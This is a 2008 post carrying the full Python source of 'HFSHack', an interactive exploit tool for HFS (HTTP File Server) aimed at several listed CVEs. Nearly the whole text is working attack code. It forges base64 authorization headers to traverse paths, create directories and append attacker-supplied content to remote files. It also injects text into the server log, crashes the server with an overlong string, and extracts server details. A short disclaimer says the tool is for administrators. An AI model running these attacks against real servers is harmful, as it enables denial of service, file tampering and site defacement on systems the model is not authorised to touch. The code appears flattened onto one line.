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Posted on 25 January 2008

#!/usr/bin/python """ ---------------------------------------------------------------- HFSHack 1.0b (By Felipe M. Aragon And Alec Storm ) ---------------------------------------------------------------- * CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS * CVE-2008-0410 - Information Disclosure Vulnerability Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174) http://www.syhunt.com/advisories/hfs-1-template.txt * CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability * CVE-2008-0406 - Denial of Service (DoS) Vulnerability Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174) http://www.syhunt.com/advisories/hfs-1-log.txt * CVE-2008-0407 - Username Spoofing Vulnerability * CVE-2008-0408 - Log Forging / Injection Vulnerability Affected Versions: HFS 1.5g to and including 2.3(Beta Build 174); and possibly HFS version 1.5f http://www.syhunt.com/advisories/hfs-1-username.txt Vulnerabilities found by Syhunt (http://www.syhunt.com) Sandcat can also identify these issues: http://www.syhunt.com/sandcat """ import urllib2, sys, re, commands, StringIO, string, base64 host = '' # Default Host help = (' ' 'open [hostname] ' ' This should be called first (unless you want the default host) ' 'checkdos ' ' Performs the Log DoS Attack (Makes the server crash) ' 'checkxss ' ' Checks for the presence of the Template XSS Vulnerability ' 'manipf [localfilename] [remotefilename] ' ' Appends content of a local file to a remote file. Examples: ' ' manipf inject.html index.html or ..\..index.html ' ' Note: If the file does not exists, it will be created. ' 'maniplog [localfilename] ' ' Injects content of a local file to the HFS log panel and file ' 'mkd [dirname] ' ' Creates directories. Examples: ' ' mkd Test or ..\..\Windows\Test ' 'symbols ' ' Forces HFS to reveal details about the server ' 'ver ' ' Forces HFS to show its version and build, and displays which ' ' HFSHack commands are available for it ' 'quit ' ' Exits this application' ' ') readme = ( '(c) 2008 Syhunt Security. All rights reserved. ' 'This tool is provided ''as-is'', without any expressed or implied ' 'warranty. In no event will the author be held liable for any ' 'damages arising from the use of this tool. ' 'Permission is granted to anyone to use this tool, and to alter ' 'it and redistribute it freely, subject to the following ' 'restrictions: ' '1. The origin of this tool must not be misrepresented, you must ' ' not claim that you wrote the original tool. ' '2. Altered source versions must be plainly marked as such, and ' ' must not be misrepresented as being the original plugin. ' '3. This notice may not be removed or altered from any source ' ' distribution. ' 'If you have any questions concerning this license, please email ' 'contact _at_ syhunt _dot_ com ' ) about = ( '---------------------------------------------------------------- ' ' Syhunt HFSHack 1.0b ' '---------------------------------------------------------------- ' 'This exploit tool should be used only by system administrators ' '(or other people in charge). ' 'Type "readme" and read the text before continuing ' 'If you have already read it, type "help" to view a list of ' 'commands.' ) # Extra Details to Obtain symbol_list = ( 'connections;Current number of connections to HFS', 'timestamp;Date and time of the server', 'uptime;Uptime', 'speed-out;Current outbound speed', 'speed-in;Current inbound speed', 'total-out;Total amount of bytes sent', 'total-downloads;Total amount of bytes sent', 'total-hits;Total Hits', 'total-uploads;Total Uploads', 'number-addresses;Current number of connected clients (IPs)', 'number-addresses-ever;Number of unique IPs ever connected', 'number-addresses-downloading;Current number of downloading clients (IPs)', ) # Affected Versions re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)' re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)' re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)' re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])' # Common Messages msg_par_mis = 'Parameter(s) missing.' msg_done = 'Done. ' msg_acc_file = 'Error reading local file (file not found):' msg_help = 'Type "help" to view a list of commands.' msg_err_con = 'Error Connecting:' msg_fail = 'Failed.' msg_req_ok = 'Request accepted.' uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)'; path = '/' # Default Path def dorequest(hpath,auth_data,s_msg,f_msg): globals()["rcvd"] = '' globals()["banner"] = '' url = 'http://'+host+hpath try: opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', uagent)] if auth_data != '': opener.addheaders = [('Authorization', 'Basic '+auth_data)] globals()["rcvd"] = opener.open(url).readlines() if 'server' in opener.open(url).headers: globals()["banner"] = opener.open(url).headers['server'] except Exception, msg: if f_msg != '': print f_msg,msg return False else: if s_msg != '': print s_msg return True def genbase64str(string): base64str = base64.encodestring(string); base64str = base64str.replace(" ","") return base64str def readlocalfile(filename): file = open(filename, "r") text = file.readlines() file.close() print text filecontentstr = '' for l in text: filecontentstr = filecontentstr+l return filecontentstr def ishostavailable(): return dorequest(path,'','',msg_err_con) def getservinfo(symbol,desc): base64str = base64.encodestring('<id>%'+symbol+'%</id>'); if dorequest(path,base64str,'',msg_err_con): for l in rcvd: hfsver = re.findall('<id>(.*?)</id>', l) for r in hfsver: if r != []: hfsverdec = urllib2.unquote(hfsver[0]) if desc != '': print desc+': '+hfsverdec return hfsverdec else: return '' def getallservinf(): for l in symbol_list: curl = l.split(';') getservinfo(curl[0],curl[1]) def hfsmkdir(dirname): base64str = genbase64str('\..\'+dirname+'\')+'AA'; dorequest(path,base64str,msg_req_ok,msg_fail) def shutdownhfs(): dosstr = genbase64str('a' * 270 + ':') if dorequest(path,dosstr,msg_fail,'DoS executed.'): dorequest(path,'','Host is still up.','Host is now down.') def hfsappendtofile(filename,string): base64str = genbase64str('\..\'+filename)+'AA'; dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail) def hfsinjecttolog(string): base64str = genbase64str(string); dorequest('/',base64str,msg_req_ok,msg_fail) def procparams(cmd): try: if len(cmd) > 0: if cmd[1] != []: globals()["host"] = cmd[1] except: print "No target info provided. Using localhost" def checkxss(): if ishostavailable(): curver = getservinfo('version','') if curver != '': return 'XSS Found' else: return 'Not Vulnerable' else: return msg_fail def isbanner(regex): p = re.compile(regex) m = p.match(banner) return m def showacceptedcmds(): cmds = 'None (This server is not vulnerable)'; if isbanner(re_200801161): cmds = 'checkxss symbols ver' if isbanner(re_200801162): cmds = cmds+' manipf mkd checkdos' if isbanner(re_200801163): cmds = cmds+' maniplog' print ' Available commands for this server:' print ' '+cmds+' ' def showver(): cangetver = True if banner != '': server_name = banner.split() print banner if server_name[0] != 'HFS': print 'Not running HFS!' cangetver = False else: if isbanner(re_cangetver): print 'Confirming version...' else: cangetver = False else: print 'No version information found.' print 'The "Send HFS identifier" option is probably disabled.' print 'Trying to force HFS to display its version...' if cangetver == True: idver = getservinfo('version','HFS version number') idbuild = getservinfo('build','HFS build number') globals()["banner"] = 'HFS '+idver+' '+idbuild showacceptedcmds() def result(s): cmd = s.split() if len(cmd) > 0: curcmd = cmd[0] result = 'Invalid command. Type "help" for list of commands.' if curcmd == 'open': procparams(cmd) if ishostavailable(): showver() result = 'Connected. ' else: result = msg_fail elif curcmd == 'symbols': if ishostavailable(): showver() print 'Forcing HFS to reveal more details...' getallservinf() result = msg_done elif curcmd == 'ver': if ishostavailable(): showver() result = msg_done elif curcmd == 'mkd': if len(cmd) > 1: if cmd[1] != []: hfsmkdir(cmd[1]) result = msg_done else: result = msg_par_mis elif curcmd == 'manipf': if len(cmd) > 2: try: localfilecontent = readlocalfile(cmd[1]) except Exception, msg: result = msg_acc_file,msg else: localfilecontent = localfilecontent.replace(" ","%0a") hfsappendtofile(cmd[2],localfilecontent) result = msg_done else: result = msg_par_mis elif curcmd == 'maniplog': if len(cmd) > 1: try: localfilecontent = readlocalfile(cmd[1]) except Exception, msg: result = msg_acc_file,msg else: hfsinjecttolog(localfilecontent) result = msg_done else: result = msg_par_mis elif curcmd == 'checkdos': shutdownhfs() result = msg_done elif curcmd == 'checkxss': result = checkxss() elif curcmd == 'help': result = help elif curcmd == 'readme': result = readme elif curcmd == 'quit': result = 'Bye!' return result else: return msg_help print about s = "" while s != "quit": try: s = raw_input(">") except EOFError: s = "quit" print s print result(s)